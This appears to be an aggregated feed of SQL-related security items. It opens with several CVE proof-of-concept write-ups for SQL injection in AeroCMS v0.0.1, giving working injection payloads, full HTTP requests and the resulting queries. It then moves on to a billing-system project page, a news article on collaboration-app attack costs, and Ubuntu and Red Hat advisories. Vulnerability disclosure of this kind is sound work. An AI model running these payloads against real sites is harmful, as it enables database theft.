AeroCMS v0.0.1 was discovered to contain a SQL Injection vulnerability via the edit parameter at \admin\categories.php. This vulnerability allows attackers to access database information.

**AeroCMS-v0.0.1-SQLi update\_categories\_sql\_injection****Step to Reproduct**

Login to admin panel -> Categories -> Edit.The edit parameter from the AeroCMS-v0.0.1 CMS system appears to be vulnerable to SQL injection attacks. The malicious user can dump-steal the database, from this CMS system and he can use it for very malicious purposes.

**Exploit**

Query out the current user

**Vulnerable Code**

1  
2  

    AeroCMS-0.0.1\admin\categories.phpAeroCMS-0.0.1\admin\includes\update_categories.php

The edit parameter is passed in the GET mode and brought into the mysql\_query() function without filtering

**POC**

*   Injection Point

1  

    edit=1+OR+(SELECT+4460+FROM(SELECT+COUNT(*),CONCAT(0x7e,(SELECT+(ELT(4460%3d4460,user()))),0x7e,FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.PLUGINS+GROUP+BY+x)a)

*   Request

1  
2  
3  
4  
5  
6  
7  
8  
9  
10  
11  
12  
13  
14  
15  
16  
17  
18  

    GET /AeroCMS-0.0.1/admin/categories.php?edit=1+OR+(SELECT+4460+FROM(SELECT+COUNT(*),CONCAT(0x7e,(SELECT+(ELT(4460%3d4460,user()))),0x7e,FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.PLUGINS+GROUP+BY+x)a) HTTP/1.1Host: localhostCache-Control: max-age=0Upgrade-Insecure-Requests: 1Origin: http://localhostUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: http://localhost/AeroCMS-0.0.1/admin/categories.php?edit=1Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Cookie: PHPSESSID=fqkp2e6i3ovd3p117cgt28snqfConnection: close

**SQL query statements**

1  

    "SELECT * FROM categories WHERE cat_id = 1 OR (SELECT 4460 FROM(SELECT COUNT(*),CONCAT(0x7e,(SELECT (ELT(4460=4460,user()))),0x7e,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)"

CVE-2022-45535: AeroCMS-v0.0.1-SQLi update_categories_sql_injection

AeroCMS v0.0.1 was discovered to contain a SQL Injection vulnerability via the post_category_id parameter at \admin\includes\edit_post.php. This vulnerability allows attackers to access database information.

CVE-2022-45529

AeroCMS v0.0.1 was discovered to contain a SQL Injection vulnerability via the p_id parameter at \post.php. This vulnerability allows attackers to access database information.

Permalink

Cannot retrieve contributors at this time

**Step to Reproduct**

*   The p_id parameter from the AeroCMS-v0.0.1 CMS system appears to be vulnerable to SQL injection attacks. The malicious user can dump-steal the database, from this CMS system and he can use it for very malicious purposes.

**Exploit**

Query out the current user

**Vulnerable Code**

The p\_id parameter is passed in the GET mode and brought into the mysql\_query() function without filtering

p\_id参数通过Get方式传入，未经过滤带入mysql\_query()函数

**SQL query statements**

    "UPDATE posts set post_views_count = post_views_count + 1 WHERE post_id = 1 AND GTID_SUBSET(CONCAT(0x7e,(SELECT (ELT(9647=9647,user()))),0x7e),9647)
    "SELECT * FROM posts WHERE post_id = 1 or if(substr(database(),1,1)='a',1,0) AND post_status = 'published'"
    

**POC**

*   Injection Point

    p_id=1+AND+GTID_SUBSET(CONCAT(0x7e,(SELECT+(ELT(9647=9647,user()))),0x7e),9647)
    

*   Request

    GET /AeroCMS-0.0.1/post.php?p_id=1+AND+GTID_SUBSET(CONCAT(0x7e,(SELECT+(ELT(9647=9647,user()))),0x7e),9647) HTTP/1.1
    Host: localhost
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.0 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: PHPSESSID=jq9gpq0retupb1aa74t4jtj243
    Connection: close

CVE-2022-45331: CVE/post_sql_injection.md at master · rdyx0/CVE

AeroCMS v0.0.1 was discovered to contain a SQL Injection vulnerability via the Category parameter at \category.php. This vulnerability allows attackers to access database information.

CVE-2022-45330

AeroCMS v0.0.1 was discovered to contain a SQL Injection vulnerability via the id parameter at \admin\post_comments.php. This vulnerability allows attackers to access database information.

Permalink

Cannot retrieve contributors at this time

**post\_comments\_sql\_injection****Step to Reproduct**

Login to admin panel -> Comments.The id parameter from the AeroCMS-v0.0.1 CMS system appears to be vulnerable to SQL injection attacks. The malicious user can dump-steal the database, from this CMS system and he can use it for very malicious purposes.

**Exploit**

Query out the current user

**Vulnerable Code**

    AeroCMS-0.0.1\admin\post_comments.php
    

The id parameter is passed in the GET mode and brought into the mysql\_query() function without filtering

**POC**

*   Injection Point

    id=1+and+(SELECT+4460+FROM(SELECT+COUNT(*),CONCAT(0x7e,(SELECT+(ELT(4460%3d4460,user()))),0x7e,FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.PLUGINS+GROUP+BY+x)a) 
    

*   Request

    GET /AeroCMS-0.0.1/admin/post_comments.php?id=1+and+(SELECT+4460+FROM(SELECT+COUNT(*),CONCAT(0x7e,(SELECT+(ELT(4460%3d4460,user()))),0x7e,FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.PLUGINS+GROUP+BY+x)a) HTTP/1.1
    Host: localhost
    Cache-Control: max-age=0
    Upgrade-Insecure-Requests: 1
    Origin: http://localhost
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.0 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Referer: http://localhost/AeroCMS-0.0.1/admin/categories.php?edit=1
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: PHPSESSID=fqkp2e6i3ovd3p117cgt28snqf
    Connection: close
    
    
    

**SQL query statements**

    "SELECT * FROM comments WHERE comment_post_id =1 and (SELECT 4460 FROM(SELECT COUNT(*),CONCAT(0x7e,(SELECT (ELT(4460=4460,user()))),0x7e,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)"

CVE-2022-45536: CVE/post_comments_sql_injection.md at master · rdyx0/CVE

Billing System Project v1.0 was discovered to contain a SQL injection vulnerability via the orderId parameter at fetchOrderData.php.

Submitted by mayuri\_k on Wednesday, June 16, 2021 - 12:05.

The **Billing system project in PHP source code free download** is designed in PHP MySQL database, Using HTML, CSS, Bootstrap, JavaScript, Ajax, JQuery to automate the process toward managing the billing system. This **invoice billing project in PHP free download** is for those who are looking for **final year project computer science with source code**.

The source code was designed by considering it as a good **final year project computer science ideas**. It contains modules or features like Dashboard, Managing Brand, Maintaining Categories, Product Addition and Deleting, Creating Invoices, Generating Reports, Setting,etc.

Many students were asking me to provide free source code of a **simple inventory system using PHP/MySQL tutorial**. So, I come with this **PHP billing system free download**. Invoicing and billing application for different business purposes helps mainly the service providers and freelancers to manage, send professional invoices online, and track their status. Generally, all the small companies in various countries facing various issues for managing and tracking the invoice status of customers, which mostly back to the lack of adopting new technology in these companies. One of these lacks is tracking the status of the bill for definite projects'. Therefore, this project aims to design and develop an online billing and invoice management system to expenses effortlessly and saves both time and money on the employees in small companies. The proposed system aims to provide digital maintaining records of clients, products, categories, and all related aspects. I asked many employers which will use to perceive their opinion towards the system's ease of use, usefulness, and satisfaction. The result revealed that the proposed system gained a satisfactory level among the staff.

This is nothing but a Billing Management System (BMS) 1.0. which have basic features which can fulfill the needs of small companies or can be used as a **final year project computer science presentation**. This **E-Billing and invoicing system** is used to overcome the entire problem which they are facing currently and making complete atomization of manual billing and invoicing system. This can also use for as **invoice generator PHP script free** or **GST billing software source code in PHP free download**. There is no doubt this is standard source code that can be considered as a good learning resource for students who are doing study in PHP. I search much about PHP accounting software source code free download project on the internet and analyze that there can be various sectors who are outdated software where many issues arise like losing database after formating computer system or once huge data load in software it runs slow.

This project was developed to fulfill user and **computer science projects for final year students with source code** requirements; however, there are lots of scopes to improve the performance of the **eBilling and Invoice System** in the area of the user interface, database performance, and query processing time, Etc.

So there are many things for future enhancement of this project. This can be a great resource for learning to **create dynamic invoice forms using PHP**.

**Software Requirement**  
Sublime OR Notepad++  
XAMPP

*   26973 views

CVE-2022-43212: Billing System Project in PHP Source Code Free Download

There is a SQL injection vulnerability in ZTE MF286R. Due to insufficient validation of the input parameters of the phonebook interface, an authenticated attacker could use the vulnerability to execute arbitrary SQL injection.

CVE-2022-39066: Security Bulletin Details

Orgs are in the middle of a rapid increase in the use of new collaboration tools to serve the needs of an increasingly dispersed workforce — and they're paying a very real security price.

Enterprises are spending nearly $1,200 a year per employee to address the risk that cloud-based workforce collaboration apps bring to their business. 

It's a well-known reality at this point that with corporate workers more dispersed than ever due to the changing work patterns introduced during the pandemic, enterprises are increasingly relying on new Web-based tools beyond email. These include cloud-based messaging, storage, shared workplaces, customer relationship management (CRM), and other apps and services.

The problem is, these tools also have widely expanded the attack surface for threat actors and increased exposure of corporate assets to the internet. Cybercriminals have quickly recognized the opportunity to exploit this reality — helped along by the fact that many of these apps are largely unproven, security-wise, according to a white paper published Nov. 22 by Osterman Research and sponsored by Perception Point.

"Threat actors have responded quickly to the emergence of new channels for employee productivity and collaboration," the researchers wrote.

Specifically, organizations are now paying $1,197 per employee each year to address successful cyber incidents across email services, cloud collaboration apps or services, and Web browsers — meaning a 500-employee company spends, on average, $600,000 on an annual basis, the researchers found. This cost excludes compliance fines, ransomware mitigation costs, and business losses from non-operational processes, they said.

Researchers ran a survey of 250 security and IT decision-makers to parse this surge in malicious incidents against these new services, and found that 60% of the attack attempts arrive via email — which remains the most widely attacked enterprise service, the researchers found.

Moreover some attacks — such as those involving malware installed on an endpoint — are occurring with even more frequency, up 87%.

The situation is only likely to get worse, with more than 70% of respondents believing the frequency of security threats will remain the same or increase over the next two years, the researchers said. This outlook is due to the time organizations need time to respond to the rapid rate of expansion in the use of these apps and adjust their new security posture accordingly, they acknowledged.

**Too Many Cloud Collaboration Apps?**

On average, organizations surveyed said they use about six various apps and services for communication and collaboration across their workforce. 

Among the most popular apps being used for workforce collaboration now include messaging apps such as Microsoft Teams, Slack, or WhatsApp; cloud storage and collaboration apps such as Google Drive, OneDrive, SharePoint, or Box; shared workspaces such as Microsoft Teams, Google Workspace, or Huddle; enterprise social networks such as Facebook Workplace, Jive, or Microsoft Yammer; CRM tools such as Salesforce, HubSpot, Zendesk, or Microsoft Dynamics CRM; cloud storage services such as AWS S3 buckets or Microsoft Blob Storage; and online meeting tools such as Zoom, WebEx, or Microsoft Teams meetings.

Moreover, employees also use a host of unsanctioned communication and cloud collaboration apps, such as personal Dropbox storage accounts or personal Zoom accounts, which also put the enterprise at risk.

There have been recent security incidents that highlight the vulnerability of these apps and why enterprises should be paying close attention. Researchers from Varonis Threat Labs, for instance, recently found multiple security vulnerabilities — including a nasty SQL injection bug — in Zendesk's Web-based CRM platform that could have allowed attackers to access sensitive information from potentially any customer account.

Meanwhile, legions of databases — and, thus, customers' personally identifiable information (PII) — are being inadvertently exposed to the Internet monthly through a feature of Amazon Relational Database Service, a popular cloud-based data-backup service offered by Amazon Web Services, according to recent research from the Mitiga Research Team.

Both of these incidents demonstrate the security weaknesses lurking in the cloud-based apps that are becoming the backbone of enterprise workforce collaboration, with 19% of respondents acknowledging that they use as many as nine of these tools, significantly increasing their attack surface, the researchers said.

"Using such a wide range of tools increases the amount of vectors which attackers can target," they wrote.

Not only are there more attacks against these apps and services but they're also increasing in sophistication, the researchers found. A full 72% of respondents indicated that attacks against cloud storage services have grown more sophisticated over the past year, and 57% said the same about attacks against email.

"This trend is especially concerning given the rapid rate of adoption of new cloud-based apps and services," the researchers noted.

**How to Respond**

The situation clearly demands a response from enterprises, which have a number of options for how they can address and minimize their risk of attack against these various apps and services, the researchers said.

However, it will take some effort on their part, including an updating of traditional security postures, noted Michael Sampson, senior analyst at Osterman Research

"Organizations cannot afford — financially or reputationally — to rely on outdated approaches," he said in a press statement. "Our survey demonstrates the clear need for agile and holistic threat prevention solutions."

Enterprises are already on the case, according to the report. Some ways organizations said they will try to mitigate the situation in the coming year include deploying at least one new security tool to combat threats, with 69% of respondents saying they plan to deploy three or more.

Enterprises also should be consolidating their security stack for more holistic and efficient threat protection, as well as leveraging managed services to support their security teams with scalable and flexible incident response capabilities, the researchers advised.

"Fast, holistic, and accurate threat prevention across all channels is singularly important in an era of increasingly frequent and sophisticated cyber incidents," they wrote.

Enterprises Pay $1,200 Per Employee Annually to Fight Cyberattacks Against Cloud Collab Apps

Ubuntu Security Notice 5716-2 - USN-5716-1 fixed a vulnerability in SQLite. This update provides the corresponding update for Ubuntu 14.04 ESM. It was discovered that SQLite incorrectly handled certain long string arguments. An attacker could use this issue to cause SQLite to crash, resulting in a denial of service, or possibly execute arbitrary code.

    =========================================================================Ubuntu Security Notice USN-5716-2November 21, 2022sqlite3 vulnerability=========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 14.04 ESMSummary:SQLite could be made to crash or run programs if it received speciallycrafted input.Software Description:- sqlite3: C library that implements an SQL database engineDetails:USN-5716-1 fixed a vulnerability in SQLite. This update providesthe corresponding update for Ubuntu 14.04 ESM.Original advisory details: It was discovered that SQLite incorrectly handled certain long string arguments. An attacker could use this issue to cause SQLite to crash, resulting in a denial of service, or possibly execute arbitrary code.Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 14.04 ESM:  libsqlite3-0                    3.8.2-1ubuntu2.2+esm3In general, a standard system update will make all the necessary changes.References:  https://ubuntu.com/security/notices/USN-5716-2  https://ubuntu.com/security/notices/USN-5716-1  CVE-2022-35737

Ubuntu Security Notice USN-5716-2

Red Hat Security Advisory 2022-8560-01 - The hsqldb packages provide a relational database management system written in Java. The Hyper Structured Query Language Database contains a JDBC driver to support a subset of ANSI-92 SQL.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: hsqldb security update  
Advisory ID:       RHSA-2022:8560-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:8560  
Issue date:        2022-11-21  
CVE Names:         CVE-2022-41853  
====================================================================  
1. Summary:

An update for hsqldb is now available for Red Hat Enterprise Linux 7.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux Client Optional (v. 7) - noarch  
Red Hat Enterprise Linux ComputeNode Optional (v. 7) - noarch  
Red Hat Enterprise Linux Server (v. 7) - noarch  
Red Hat Enterprise Linux Server Optional (v. 7) - noarch  
Red Hat Enterprise Linux Workstation (v. 7) - noarch  
Red Hat Enterprise Linux Workstation Optional (v. 7) - noarch

3. Description:

The hsqldb packages provide a relational database management system written  
in Java. The Hyper Structured Query Language Database (HSQLDB) contains a  
JDBC driver to support a subset of ANSI-92 SQL.

Security Fix(es):

* hsqldb: Untrusted input may lead to RCE attack (CVE-2022-41853)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2136141 - CVE-2022-41853 hsqldb: Untrusted input may lead to RCE attack

6. Package List:

Red Hat Enterprise Linux Client Optional (v. 7):

Source:  
hsqldb-1.8.1.3-15.el7_9.src.rpm

noarch:  
hsqldb-1.8.1.3-15.el7_9.noarch.rpm  
hsqldb-demo-1.8.1.3-15.el7_9.noarch.rpm  
hsqldb-javadoc-1.8.1.3-15.el7_9.noarch.rpm  
hsqldb-manual-1.8.1.3-15.el7_9.noarch.rpm

Red Hat Enterprise Linux ComputeNode Optional (v. 7):

Source:  
hsqldb-1.8.1.3-15.el7_9.src.rpm

noarch:  
hsqldb-1.8.1.3-15.el7_9.noarch.rpm  
hsqldb-demo-1.8.1.3-15.el7_9.noarch.rpm  
hsqldb-javadoc-1.8.1.3-15.el7_9.noarch.rpm  
hsqldb-manual-1.8.1.3-15.el7_9.noarch.rpm

Red Hat Enterprise Linux Server (v. 7):

Source:  
hsqldb-1.8.1.3-15.el7_9.src.rpm

noarch:  
hsqldb-1.8.1.3-15.el7_9.noarch.rpm

Red Hat Enterprise Linux Server Optional (v. 7):

Source:  
hsqldb-1.8.1.3-15.el7_9.src.rpm

noarch:  
hsqldb-1.8.1.3-15.el7_9.noarch.rpm  
hsqldb-demo-1.8.1.3-15.el7_9.noarch.rpm  
hsqldb-javadoc-1.8.1.3-15.el7_9.noarch.rpm  
hsqldb-manual-1.8.1.3-15.el7_9.noarch.rpm

Red Hat Enterprise Linux Workstation (v. 7):

Source:  
hsqldb-1.8.1.3-15.el7_9.src.rpm

noarch:  
hsqldb-1.8.1.3-15.el7_9.noarch.rpm

Red Hat Enterprise Linux Workstation Optional (v. 7):

noarch:  
hsqldb-demo-1.8.1.3-15.el7_9.noarch.rpm  
hsqldb-javadoc-1.8.1.3-15.el7_9.noarch.rpm  
hsqldb-manual-1.8.1.3-15.el7_9.noarch.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-41853  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY3vJxNzjgjWX9erEAQiSUw//UJFY2xsCnIsTAIyksjQG0oVvUVtrZgmS  
zXX1zlCtPSaPbnyvXQx2bYC+WfP3V5/8n4/9V6OVQruaPCfgk50074FarBRWNl3c  
JijAfca6orVZcOmYI8thSte1XX8gTr0y8Nz5/Uh00ocEt6gJlrvebUFW9PxiqITi  
7jkbySojkJ8JQy/sXv0/o6ZF2lTIb5p2YIZHb/BloCcoUmm2ZKY0TwA9BY9gEEb6  
7UFccLSIG4/HWx7v2N9Wvku1osidtLc1i2dvkah60AM/B3gWA0daRm4eOZPSyNHs  
IN2C8B8J9PCFKqouCQ5muYtK0JtV5jJjhDD7M7RWcAF4TFDHrjHrPXUifp6m/JHj  
qwkEeCoj2UtX+nNWN0J4typ9x2vDBqsAH+PfLhg6Dsk6VtVe840+zCwB2m9v2dic  
bZUXtatqn3Mn599f35WmASw4F1puhqdt9chcfsF2kvqx8nFmrRix3KKIQsdl/K58  
W9UdasDiOD8PV0pN5LULv3vtzk6PCJJMvKp3VFWcm3JsqNEEXYCCvDF7FATZYCqB  
B5dE72yuwz7bUyHLw23z7uV96KbQYfd0djbkNDqfSdfCvuy8UzDiu4CMjIBDtxm/  
F0//LAUZKSc2xovaJho9tU6EcpuYzKe24o9yxXjl/Pg3pBeY2pDlExUzoFW+BpO/  
D6Z1tkBjj8E=VAOx  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Tag

#sql